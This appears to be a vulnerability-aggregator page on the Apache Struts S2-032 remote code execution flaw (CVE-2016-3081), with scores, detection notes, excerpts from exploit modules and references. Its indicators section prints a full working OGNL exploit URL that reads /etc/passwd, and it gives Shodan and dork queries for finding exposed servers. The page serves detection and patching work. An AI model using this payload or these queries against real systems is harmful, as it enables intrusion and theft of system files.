CVE-2016-3081
published 2016-04-26CVE-2016-3081: Apache Struts 2.3.19 to 2.3.20.2, 2.3.21 to 2.3.24.1, and 2.3.25 to 2.3.28, when Dynamic Method Invocation is enabled, allow remote attackers to execute…
PriorityP181high8.1CVSS 3.0
AVNACHPRNUINSUCHIHAH
EXPLOIT
EPSS
94.16%
99.8th percentile
Apache Struts 2.3.19 to 2.3.20.2, 2.3.21 to 2.3.24.1, and 2.3.25 to 2.3.28, when Dynamic Method Invocation is enabled, allow remote attackers to execute arbitrary code via method: prefix, related to chained expressions.
Affected
57 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apache | struts | — | — |
| apache | struts | — | — |
| apache | struts | — | — |
| apache | struts | — | — |
| apache | struts | — | — |
| apache | struts | — | — |
| apache | struts | — | — |
| apache | struts | — | — |
| apache | struts | — | — |
| apache | struts | — | — |
| apache | struts | — | — |
| apache | struts | — | — |
| apache | struts | — | — |
| apache | struts | — | — |
| apache | struts | — | — |
| apache | struts | — | — |
| apache | struts | — | — |
| apache | struts | — | — |
| apache | struts | — | — |
| apache | struts | — | — |
| apache | struts | — | — |
| apache | struts | — | — |
| apache | struts | — | — |
| apache | struts | — | — |
| apache | struts | — | — |
Detection & IOCsextracted from sources · hover to see the quote
urlGET /index.action?method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1↗
sigma↗
regex: root:.*:0:0:
- →Detect exploitation attempts by monitoring HTTP requests containing 'method:' prefix in the URI query string, particularly with OGNL expressions such as '%23_memberAccess' or '@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS'. ↗
- →Use Shodan/FOFA queries to identify exposed Apache Struts instances: search for 'http.html:"apache struts"', 'http.title:"struts2 showcase"', 'http.html:"struts problem report"', 'body="struts problem report"', 'title="struts2 showcase"', or Google dork 'intitle:"struts2 showcase"'. ↗
- →Exploitation involves chained OGNL expressions passed via the 'method:' prefix in the action URL. Monitor for URL-encoded OGNL tokens such as '%23', '@java.lang.Runtime@getRuntime().exec', and '@org.apache.struts2.ServletActionContext@getResponse()' in HTTP request URIs. ↗
- →The Metasploit module uses a canary-based check: it injects an arithmetic expression via OGNL and looks for the computed sum wrapped in a random flag string in the HTTP 200 response body. Detect this pattern in responses or WAF logs. ↗
- →Post-exploitation, the Metasploit module uploads a binary payload to /tmp/ and executes it via '/bin/sh -c'. Monitor for unexpected file creation in /tmp/ followed by chmod and shell execution on Struts application servers. ↗
- ·The vulnerability is only exploitable when Dynamic Method Invocation (DMI) is explicitly enabled in the Struts 2 configuration. Installations with DMI disabled are not affected. ↗
- ·Affected versions are Apache Struts 2.3.19–2.3.20.2, 2.3.21–2.3.24.1, and 2.3.25–2.3.28. Versions 2.3.20.2 and 2.3.24.2 are explicitly excluded from the vulnerable range in the Metasploit module. ↗
- ·The Metasploit module targets Linux x86 only (linux/x86/meterpreter/reverse_tcp_uuid payload). Exploitation on other platforms may require different staging. ↗
- ·If the application's home directory is not writable, the TMPPATH option must be overridden to a writable path for the file upload stage of exploitation to succeed. ↗
CVSS provenance
nvdv3.08.1HIGHCVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
Apache Struts RCE Vulnerability
ghsa·2022-05-14
CVE-2016-3081 [HIGH] CWE-77 Apache Struts RCE Vulnerability
Apache Struts RCE Vulnerability
Apache Struts 2.3.19 to 2.3.20.2, 2.3.21 to 2.3.24.1, and 2.3.25 to 2.3.28, when Dynamic Method Invocation is enabled, allow remote attackers to execute arbitrary code via method: prefix, related to chained expressions.
OSV
Apache Struts RCE Vulnerability
osv·2022-05-14
CVE-2016-3081 [HIGH] Apache Struts RCE Vulnerability
Apache Struts RCE Vulnerability
Apache Struts 2.3.19 to 2.3.20.2, 2.3.21 to 2.3.24.1, and 2.3.25 to 2.3.28, when Dynamic Method Invocation is enabled, allow remote attackers to execute arbitrary code via method: prefix, related to chained expressions.
No detection rules found.
Exploit-DB
Apache Struts - Dynamic Method Invocation Remote Code Execution (Metasploit)
exploitdb·2016-05-02
CVE-2016-3081 Apache Struts - Dynamic Method Invocation Remote Code Execution (Metasploit)
Apache Struts - Dynamic Method Invocation Remote Code Execution (Metasploit)
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule 'Apache Struts Dynamic Method Invocation Remote Code Execution',
'Description' => %q{
This module exploits a remote command execution vulnerability in Apache Struts
version between 2.3.20 and 2.3.28 (except 2.3.20.2 and 2.3.24.2). Remote Code
Execution can be performed via method: prefix when Dynamic Method Invocation
is enabled.
},
'Author' => [ 'Nixawk' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2016-3081' ],
[ 'URL', 'https://www.seebug.org/vuldb/ssvid-91389' ]
],
'Platform' => %w{ linux },
'Privileged' => true,
'
Nuclei
Apache S2-032 Struts - Remote Code Execution
nuclei·CVSS 8.1
CVE-2016-3081 [HIGH] Apache S2-032 Struts - Remote Code Execution
Apache S2-032 Struts - Remote Code Execution
Apache Struts 2.3.19 to 2.3.20.2, 2.3.21 to 2.3.24.1, and 2.3.25 to 2.3.28, when dynamic method invocation is enabled, allows remote attackers to execute arbitrary code via method: prefix (related to chained expressions).
Template:
id: CVE-2016-3081
info:
name: Apache S2-032 Struts - Remote Code Execution
author: dhiyaneshDK
severity: high
description: |
Apache Struts 2.3.19 to 2.3.20.2, 2.3.21 to 2.3.24.1, and 2.3.25 to 2.3.28, when dynamic method invocation is enabled, allows remote attackers to execute arbitrary code via method: prefix (related to chained expressions).
impact: |
Remote code execution
remediation: |
Upgrade to Apache Struts version 2.3.20.2, 2.3.24.2, or 2.3.28.1.
reference:
- https://cwiki.apache.org/confluence/display/WW
Metasploit
Apache Struts Dynamic Method Invocation Remote Code Execution
metasploit
Apache Struts Dynamic Method Invocation Remote Code Execution
Apache Struts Dynamic Method Invocation Remote Code Execution
This module exploits a remote command execution vulnerability in Apache Struts version between 2.3.20 and 2.3.28 (except 2.3.20.2 and 2.3.24.2). Remote Code Execution can be performed via method: prefix when Dynamic Method Invocation is enabled.
Greynoiseio
NoiseLetter October 2024
blogs_greynoiseio
NoiseLetter October 2024
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Recorded Future
Turning Criminal Forum Exploit Chatter Into Vulnerability Risk Analysis
blogs_recorded_future
Turning Criminal Forum Exploit Chatter Into Vulnerability Risk Analysis
# Turning Criminal Forum Exploit Chatter Into Vulnerability Risk Analysis
Editor’s Note: Some of the analysis featured in this article utilizes real-time intelligence from our new Vulnerability Intelligence Cards™. With this summarized data you can assess, prioritize, and remediate vulnerabilities with much greater speed and confidence to reduce your risk. Find out more in the “Threat Intelligence Use Cases” section of our website.
### Key Takeaways
- Recorded Future’s programmatic identification of exploit chatter for vulnerabilities leads to improved remediation prioritization. This prioritization is based on evidence-based assessment of increased adversary intent and/or capabilities.
- Recorded Future’s foreign natural language processing (NLP) adds significant value to vulnerability
Recorded Future
Turning Criminal Forum Exploit Chatter Into Vulnerability Risk Analysis | Recorded Future
blogs_recorded_future
Turning Criminal Forum Exploit Chatter Into Vulnerability Risk Analysis | Recorded Future
## Turning Criminal Forum Exploit Chatter Into Vulnerability Risk Analysis
Editor’s Note : Some of the analysis featured in this article utilizes real-time intelligence from our new Vulnerability Intelligence Cards™. With this summarized data you can assess, prioritize, and remediate vulnerabilities with much greater speed and confidence to reduce your risk. Find out more in the “ Threat Intelligence Use Cases ” section of our website.
## Key Takeaways
Recorded Future’s programmatic identification of exploit chatter for vulnerabilities leads to improved remediation prioritization. This prioritization is based on evidence-based assessment of increased adversary intent and/or capabilities.
Recorded Future’s foreign natural language processing (NLP) adds significant value to vulnerability
arXiv
ATTACK2VEC: Leveraging Temporal Word Embeddings to Understand the Evolution of Cyberattacks
arxiv_fulltext·2019-05-29
ATTACK2VEC: Leveraging Temporal Word Embeddings to Understand the Evolution of Cyberattacks
: Leveraging Temporal Word Embeddings to
Understand the Evolution of Cyberattacks
## Abstract
Despite the fact that cyberattacks are constantly growing in complexity, the research community still lacks effective tools to easily monitor and understand them.
In particular, there is a need for techniques that are able to not only track how prominently certain malicious actions, such as the exploitation of specific vulnerabilities, are exploited in the wild, but also (and more importantly) how these malicious actions factor in as attack steps in more complex cyberattacks.
In this paper we present , a system that uses temporal word embeddings to model how attack steps are exploited in the wild, and track how they evolve.
We test on a dataset of billions of security events collected from the c
Bugzilla
CVE-2016-3081 Struts2: RCE via method: prefix when Dynamic Method Invocation is enabled (S2-032)
bugzilla·2016-04-27·CVSS 8.1
CVE-2016-3081 [HIGH] CVE-2016-3081 Struts2: RCE via method: prefix when Dynamic Method Invocation is enabled (S2-032)
CVE-2016-3081 Struts2: RCE via method: prefix when Dynamic Method Invocation is enabled (S2-032)
It is possible to pass a malicious expression which can be used to execute arbitrary code on server side when Dynamic Method Invocation is enabled.
External References:
https://struts.apache.org/docs/s2-032.html
Discussion:
Statement:
A previous statement by Red Hat related to this CVE, prior to August 2019, said that Apache Struts 2 is not included in any Red Hat products. This earlier statement was incorrect. While Struts 2 is not actively compiled, shipped, used, or enabled in any Red Hat provided final products, and does not cause any vulnerability in the product, struts2-core jars have been included in some products' source code packages. The inclusion was part of an import of the Go
http://packetstormsecurity.com/files/136856/Apache-Struts-2.3.28-Dynamic-Method-Invocation-Remote-Code-Execution.htmlhttp://www.huawei.com/en/psirt/security-advisories/huawei-sa-20160527-01-struts2-enhttp://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.htmlhttp://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.htmlhttp://www.rapid7.com/db/modules/exploit/linux/http/struts_dmi_exechttp://www.rapid7.com/db/modules/exploit/multi/http/struts_dmi_exechttp://www.securityfocus.com/bid/87327http://www.securityfocus.com/bid/91787http://www.securitytracker.com/id/1035665https://struts.apache.org/docs/s2-032.htmlhttps://www.exploit-db.com/exploits/39756/http://packetstormsecurity.com/files/136856/Apache-Struts-2.3.28-Dynamic-Method-Invocation-Remote-Code-Execution.htmlhttp://www.huawei.com/en/psirt/security-advisories/huawei-sa-20160527-01-struts2-enhttp://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.htmlhttp://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.htmlhttp://www.rapid7.com/db/modules/exploit/linux/http/struts_dmi_exechttp://www.rapid7.com/db/modules/exploit/multi/http/struts_dmi_exechttp://www.securityfocus.com/bid/87327http://www.securityfocus.com/bid/91787http://www.securitytracker.com/id/1035665https://struts.apache.org/docs/s2-032.htmlhttps://www.exploit-db.com/exploits/39756/
2016-04-26
Published